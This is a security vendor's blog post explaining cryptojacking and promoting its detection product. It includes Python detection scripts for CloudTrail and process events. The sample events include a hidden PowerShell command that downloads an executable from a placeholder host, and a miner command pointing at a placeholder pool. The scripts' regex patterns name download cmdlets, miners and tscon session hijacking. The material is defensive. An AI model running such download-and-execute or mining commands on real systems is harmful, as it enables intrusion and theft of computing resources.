Last year, I wrote that ransomware was the summer anthem of 2017. At the time, it seemed impossible that the onslaught of global ransomware attacks like WannaCry and NotPetya would ever wane. But, I should have known better. Every summertime anthem eventually gets overplayed.
This year, cryptojacking took over the airwaves, fueled by volatile global cryptocurrency markets. In the first half of 2018, detected cryptojacking attacks increased 141%, outpacing ransomware attacks. In this blog post, I’ll address cryptojacking: what it is, how it works, how to detect it, and why you should be tuning into this type of threat.
What is Cryptojacking?
Cryptojacking definition: Cryptojacking is the act of using another’s computational resources without their knowledge or permission for cryptomining activities.
By cryptojacking mobile devices, laptops, and servers, attackers effectively steal the CPU of your device to mine for cryptocurrencies like Bitcoin and Monero. Whereas traditional malware attacks target sensitive data that can be exploited for financial gain, like social security numbers and credit card information, cybercriminals that launch cryptojacking campaigns are more interested in your device’s computing power than your own personal data. To understand why, it’s helpful to consider the economics of cryptocurrency mining.
Mining for cryptocurrencies like Bitcoin and Monero takes some serious computing resources to solve the complex algorithms used to discover new coins. These resources are not cheap, as anyone who pays their organization’s AWS bill or data center utility bill can attest to. So, in order for cryptocurrency mining to be profitable and worthwhile, the market value of the cryptocurrency must be higher than the cost of mining it – that is, unless you can eliminate the resource costs altogether by stealing others’ resources to do the mining for you.
That’s exactly what cryptojacking attacks aim to do, to silently turn millions of devices into cryptomining bots, enabling cybercriminals to turn a profit without all the effort and uncertainty of collecting a ransom. Often, cryptojacking attacks are designed to evade detection by traditional antivirus tools so that they can quietly run in the background of the machine.
Does this mean that all cryptomining activity is malicious? Well, it depends on who you ask.
Cryptomining vs. Cryptojacking
As the cryptocurrency markets have gained value and become more mainstream in recent years, we’ve seen a digital gold rush to cryptomine for new Bitcoin, and more recently, Monero. What began with early adopters and hobbyists building home rigs to mine for new coins has now given way to an entire economy of mining as a service, cryptomining server farms, and even cryptomining cafes. In this sense, cryptomining is, more or less, considered a legal and legitimate activity, one that could be further legitimized by a rumored $12 billion Bitmain IPO.
Yet, the lines between cryptomining and cryptojacking are blurry. For example, the cryptomining “startup” Coinhive has positioned its technology as an alternative way to monetize a website, instead of by serving ads or charging a subscription. According to the website, the folks behind Coinhive, “dream about it as an alternative to micropayments, artificial wait time in online games, intrusive ads and dubious marketing tactics.”
Yet at the same time, Coinhive has been one of the most common culprits found in cryptojacking attacks this year. In fact, one recent report analyzed cryptojacking sites and found that nearly 50,000 websites were running cryptocurrency malware, Coinhive among them. Recent Coinhive victims include the Los Angeles Times, Politifact.com, and both AOL and Google’s Ad Networks. Further blurring the lines, Coinhive has been heavily criticized for its handling of (or lack thereof) abuse complaints.
As a result of the dramatic rise in cryptojacking attacks this year, many in the infosec community have come to consider all cryptominers as malware. And, browser developers have started to introduce browser extensions to block cryptomining activities, such as No Coin.
This “trust-no-miner” sentiment is strong in the infosec community. According to our own AlienVault research, only 8% of cybersecurity professionals would consent to their computer being used for cryptomining in exchange for accessing content on a website, although a slightly larger group of altruists (38%) would consent if that cryptomining activity benefited a charity.
So, while legitimate cryptomining activities will likely continue to grow as the cryptocurrency markets evolve with investments in large-scale operations, it’s unlikely that cryptomining as a form of micropayment will gain mass adoption any time soon.
Cryptojacking – What’s at Stake?
While a cryptojacking attack might not be as acutely devastating as a ransomware attack, it can cause serious damage to your business. Here’s a list of the possible impacts a cryptojacking attack can have:
- A slow-loading website: When an attacker exploits a website vulnerability by injecting a cryptomining tool like Coinhive, it can slow down page load time, driving away your visitors, users, or shoppers. Some attacks intentionally add a delay so that they can use more resources while the user waits for the page to load, as seen in the attack against Starbucks’ WiFi network in Buenos Aires cafes.
- High resource costs: If cryptominers persist in your infrastructure, you might unknowingly be footing a higher data center utility bill or cloud services provider bill. Think of it like this: If ransomware were grand theft auto, cryptojacking would be more akin to someone siphoning the gas from your tank little by little. You might not notice it right away, but your more frequent stops at the gas pump would eventually add up. That’s not all. Running CPU and GPU higher for a longer time can accelerate the wear and tear on your hardware, shortening its lifecycle and increasing your hardware costs.
- Data loss: No one wants to wake up to an egregious bill from their cloud services provider because an attacker spun up unbounded resources overnight for cryptomining. While many security and IT teams have put in place auto-scaling limits to safeguard against this, some cryptojacking attacks are designed to start deleting existing cloud services when that limit is met.
- Security breach: Attackers are becoming increasingly efficient in their maldoings by packaging multiple attack modules and payloads into a single campaign. A malware campaign might drop a cryptominer packaged alongside a keylogger, backdoor, and other tools and techniques. If you detect cryptomining activities in your environment, don’t assume that the attackers’ intentions are single threaded. Opportunist attackers seeking financial gain will try to maximize their profits, whether by stealing your resources, your data, or both, if you let them.
How Cryptojacking Attacks Work
Cryptojacking attacks take on multiple forms in the wild, often packaged with other modern attack modules found in various malware and ransomware attacks. Here are three common ways we see cryptojacking attacks unfold in the wild:
Browser-based Cryptojacking Attacks
In this common type of cryptojacking attack, an attacker injects a cryptominer into a compromised website, ad platform, or browser extension, often by exploiting cross-site scripting (XSS) vulnerabilities. This enables the cryptominer to use a device’s resources whenever the user browses the website, plays an ad, or installs the malicious browser extension. However, some attacks have been known to persist by launching a separate “pop under” window that hides behind the taskbar clock and continues to mine after the user exits the website.
Cryptojacking the Public Cloud
Public cloud environments provide near-infinite computing resources for an attacker bent on cryptomining. Once an attacker has infiltrated your public cloud environment, they can silently siphon your resources and perhaps delete or flood logs to cover their tracks. Or, more aggressively and with sufficient privileges, the attacker may spin up resources rapidly and programmatically while deleting other user accounts in an attempt to lock you out of your account so that you cannot disrupt the cryptojacking.
Modern attacks against cloud infrastructure use bots to look for easy targets like unsecured servers or account credentials shared on GitHub. Practicing good cloud security hygiene across your organization is the best first defense to avoid becoming an easy target and an unfortunate headline. Here are a few good resources on cloud security best practices:
- 11 Simple Yet Important Tips to Secure AWS
- AlienVault Best Practices for AWS Security
- AWS Security Best Practices (Amazon)
- Introduction to Azure Security (Microsoft)
Advanced Fileless Malware Attacks
Fileless malware attacks are on the rise this year, and many of the campaigns we’ve observed in the wild include a cryptominer payload. Fileless attacks take advantage of PowerShell, Windows Management Instrumentation (WMI), and other common IT admin tools in order to evade detection by traditional antivirus and signature-based detection tools. For example, the AlienVault Labs Security Research Team recently analyzed MassMiner, noting that it uses PowerShell to download the cryptominer onto infected hosts. As I mentioned above, advanced fileless attacks are increasingly packaged with multiple tools, modules, and payloads into a single campaign.
Detecting modern fileless attacks requires advanced threat hunting capabilities that go well beyond perimeter and endpoint protection tools. You must be able to identify new and evolving tools, tactics, and procedures (TTPs) that attackers employ for exploitation, installation, lateral movement, persistence, and exfiltration. Unless you have dedicated resources to research the latest TTPs found in the wild, hunt for threats, and analyze all the security data from across your environment, it can be a challenge to stay at pace with these types of emerging attacks.
How AlienVault USM Anywhere Detects Cryptojacking
As you can see, there’s no single way that a cryptojacking attack unfolds in the wild. These types of attacks evolve quickly and target critical infrastructure across cloud and on-premises environments. Fortunately, USM Anywhere delivers the capabilities needed to detect and respond quickly to the latest cryptojacking attacks.
In order to detect and defend against cryptojacking attacks, it’s crucial to have visibility of your entire IT environment. USM Anywhere detects modern threats anywhere they appear across your public cloud infrastructure (AWS, Azure); SaaS / cloud apps (Office 365, Okta, G Suite); physical and virtualized on-premises infrastructure; endpoints (Windows, Linux) on and off the network; even the dark web.
To keep you at pace with the latest cryptojacking attacks without draining your security resources, USM Anywhere automates security monitoring and threat hunting activities.
For example, to detect cryptojacking attacks against your AWS cloud infrastructure, USM Anywhere detects and correlates events like:
- AWS temporary security credentials with long duration
- New user starting a high number of instances
- New user account deleting multiple users
- Multiple instances being started or shut down programmatically
- CloudTrail trails deleted
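To make the AWS event list above concrete, here is a small correlation script, written for this post as an added example rather than USM Anywhere’s own rule logic. It walks a batch of CloudTrail records, remembers which users were recently created, and raises a finding for each of the patterns listed: long-duration temporary credentials, a new user launching many instances, a new user deleting several other users, and a trail being deleted. The records are constructed, and the thresholds and rule names are assumptions chosen for illustration.

```python
"""Correlate CloudTrail records for the cryptojacking patterns listed above.

Added example (not USM Anywhere's rules). Records and thresholds are
constructed for illustration; tune them to your own account activity.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Thresholds are assumptions for the example.
MAX_INSTANCES_PER_NEW_USER = 10          # instances a brand-new user may launch
MAX_USER_DELETIONS = 2                   # deletions by a new user before alerting
NEW_USER_WINDOW = timedelta(days=1)      # how long a user counts as "new"
LONG_STS_DURATION_SECONDS = 12 * 3600    # temporary credentials valid >= 12h
STS_EVENTS = ("GetSessionToken", "AssumeRole", "GetFederationToken")


def _rec(time, user, event, **params):
    """Build a minimal CloudTrail-shaped record (constructed test data)."""
    return {"eventTime": time, "eventName": event,
            "userIdentity": {"type": "IAMUser", "userName": user},
            "requestParameters": params}


# Constructed sample: an admin creates a service user, which then requests
# long-lived credentials, mass-launches instances, deletes users and a trail.
CONSTRUCTED_RECORDS = [
    _rec("2018-08-20T01:00:00Z", "admin", "CreateUser", userName="svc-backup"),
    _rec("2018-08-20T01:05:00Z", "svc-backup", "GetSessionToken", durationSeconds=129600),
    _rec("2018-08-20T01:10:00Z", "svc-backup", "RunInstances", instancesSet={"items": [{"maxCount": 5}]}),
    _rec("2018-08-20T01:12:00Z", "svc-backup", "RunInstances", instancesSet={"items": [{"maxCount": 5}]}),
    _rec("2018-08-20T01:14:00Z", "svc-backup", "RunInstances", instancesSet={"items": [{"maxCount": 5}]}),
    _rec("2018-08-20T01:20:00Z", "svc-backup", "DeleteUser", userName="alice"),
    _rec("2018-08-20T01:21:00Z", "svc-backup", "DeleteUser", userName="bob"),
    _rec("2018-08-20T01:25:00Z", "svc-backup", "DeleteTrail", name="management-events"),
    _rec("2018-08-20T01:30:00Z", "admin", "RunInstances", instancesSet={"items": [{"maxCount": 2}]}),
]


def _when(record):
    return datetime.fromisoformat(record["eventTime"].replace("Z", "+00:00"))


def analyze(records):
    """Return findings as (rule, actor, detail) tuples, one per rule and actor."""
    created = {}                   # userName -> time the user was created
    instances = defaultdict(int)   # actor -> instances launched so far
    deletions = defaultdict(set)   # actor -> users this actor deleted
    findings, seen = [], set()

    def report(rule, actor, detail):
        if (rule, actor) not in seen:      # one finding per rule and actor
            seen.add((rule, actor))
            findings.append((rule, actor, detail))

    for r in sorted(records, key=lambda r: r["eventTime"]):
        actor = r["userIdentity"].get("userName", "?")
        name = r["eventName"]
        params = r.get("requestParameters") or {}
        is_new = actor in created and _when(r) - created[actor] <= NEW_USER_WINDOW

        if name == "CreateUser":
            created[params["userName"]] = _when(r)
        elif name in STS_EVENTS:
            if params.get("durationSeconds", 0) >= LONG_STS_DURATION_SECONDS:
                report("long_lived_temporary_credentials", actor, params["durationSeconds"])
        elif name == "RunInstances":
            items = params.get("instancesSet", {}).get("items", [])
            instances[actor] += sum(i.get("maxCount", 1) for i in items)
            if is_new and instances[actor] > MAX_INSTANCES_PER_NEW_USER:
                report("new_user_mass_instance_launch", actor, instances[actor])
        elif name == "DeleteUser":
            deletions[actor].add(params["userName"])
            if is_new and len(deletions[actor]) >= MAX_USER_DELETIONS:
                report("new_user_deleting_users", actor, sorted(deletions[actor]))
        elif name == "DeleteTrail":
            report("cloudtrail_trail_deleted", actor, params.get("name"))
    return findings


if __name__ == "__main__":
    for rule, actor, detail in analyze(CONSTRUCTED_RECORDS):
        print(f"{rule:35} actor={actor} detail={detail}")
```

The point of keeping state per actor (creation time, running instance count, deleted users) is that none of the individual API calls is suspicious on its own; it is the combination of a freshly created identity, bulk launches, user deletions and a deleted trail within a short window that distinguishes this from routine administration.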
On endpoints and across your network, USM Anywhere detects and correlates indicators of a cryptojacking attack, including anomalous or suspicious behaviors by normal processes and services. Examples include:
- RDP (remote desktop protocol) Session Hijack using tscon.exe
- Reverse PowerShell use
- An SSH process created a tunnel between two hosts
- Suspicious command executed by a listening process (JBoss, ElasticSearch, Jenkins)
- Windows User Account Control (UAC) Bypass activity detected
- A Docker container recently launched is involved in cryptomining activities
- Installation of Malicious Chrome Extension
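The endpoint indicators above, and the PowerShell-based download noted earlier for MassMiner, can be expressed as rules over process-creation events. The script below is an added example written for this post, not USM Anywhere’s detection content: it classifies Sysmon-style process events (image, parent image, command line) against a handful of illustrative patterns, namely a process connecting to a mining pool or carrying a known miner name, a miner running under a container runtime, PowerShell fetching a file from the network, tscon.exe being used to attach to another RDP session, and a Java-based listening service such as JBoss, Elasticsearch or Jenkins spawning a shell. The events are constructed, the host names and URLs are placeholders, and the regular expressions are starting points rather than a complete signature set.

```python
"""Classify process-creation events for the cryptojacking indicators above.

Added example (not USM Anywhere's correlation rules). Events are constructed
with Sysmon-like field names; patterns are illustrative starting points.
"""
import re

# Illustrative patterns (assumptions), not an exhaustive signature set.
MINER_PATTERN = re.compile(r"stratum\+(tcp|ssl)://|xmrig|minerd|cryptonight", re.I)
PS_DOWNLOAD = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|-enc(odedcommand)?\b", re.I)
TSCON_DEST = re.compile(r"/dest:", re.I)
CONTAINER_RUNTIMES = ("docker", "containerd")
SHELLS = ("cmd.exe", "powershell.exe", "sh", "bash")
JAVA_SERVICES = ("java.exe", "java")   # JBoss, Elasticsearch and Jenkins run on the JVM


def _basename(path):
    """Return the file name from a Windows or POSIX path, lower-cased."""
    return path.rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()


def classify(event):
    """Return the list of indicator names that an event matches (possibly empty)."""
    image = _basename(event["Image"])
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []

    if MINER_PATTERN.search(cmd) or MINER_PATTERN.search(image):
        hits.append("miner_process_or_pool_connection")
        if any(rt in parent for rt in CONTAINER_RUNTIMES):
            hits.append("container_running_miner")
    if image == "powershell.exe" and PS_DOWNLOAD.search(cmd):
        hits.append("powershell_network_download")
    if image == "tscon.exe" and TSCON_DEST.search(cmd):
        hits.append("rdp_session_hijack_tscon")
    if image in SHELLS and parent in JAVA_SERVICES:
        hits.append("listening_service_spawned_shell")
    return hits


def triage(events):
    """Return (index, hits) for every event that matched at least one indicator."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]


# Constructed events; placeholder.invalid and the wallet string are placeholders.
CONSTRUCTED_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden -Command "
                    "\"(New-Object Net.WebClient).DownloadFile('http://placeholder.invalid/update.exe',"
                    "'C:\\Users\\Public\\update.exe')\""},
    {"Image": r"C:\Users\Public\update.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "update.exe -o stratum+tcp://pool.placeholder.invalid:3333 -u WALLET_PLACEHOLDER"},
    {"Image": "/usr/bin/xmrig", "ParentImage": "/usr/bin/containerd-shim",
     "CommandLine": "xmrig --config=/etc/miner.json"},
    {"Image": r"C:\Windows\System32\tscon.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "tscon.exe 3 /dest:rdp-tcp#2"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Java\jre\bin\java.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Process"},   # benign
]


if __name__ == "__main__":
    for index, hits in triage(CONSTRUCTED_EVENTS):
        print(index, CONSTRUCTED_EVENTS[index]["CommandLine"][:60], hits)
```

Two of the rules deliberately key on the parent process rather than the command line: a miner whose parent is a container runtime maps to the Docker indicator in the list, and a shell whose parent is a JVM maps to the "suspicious command executed by a listening process" indicator. Parent-child relationships are harder for an intruder to disguise than a renamed binary, which is why endpoint telemetry that records them is so useful here.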
This list of TTPs is continuously and automatically updated in USM Anywhere through the threat intelligence service from the AlienVault Labs Security Research Team. This team uses machine learning capabilities, human intelligence, and the 20 million IOCs shared daily in the Open Threat Exchange (OTX) to identify emerging and evolving TTPs, which they curate and write into actionable correlation rules, endpoint queries, and more. As a result, you get alerts on real high-priority threats as well as response guidance and integrated incident response capabilities – all from a single cloud platform.
There’s much more to discover about USM Anywhere. Start your free 14-day trial to test drive USM Anywhere and see for yourself the powerful threat detection and incident response capabilities built into the unified platform.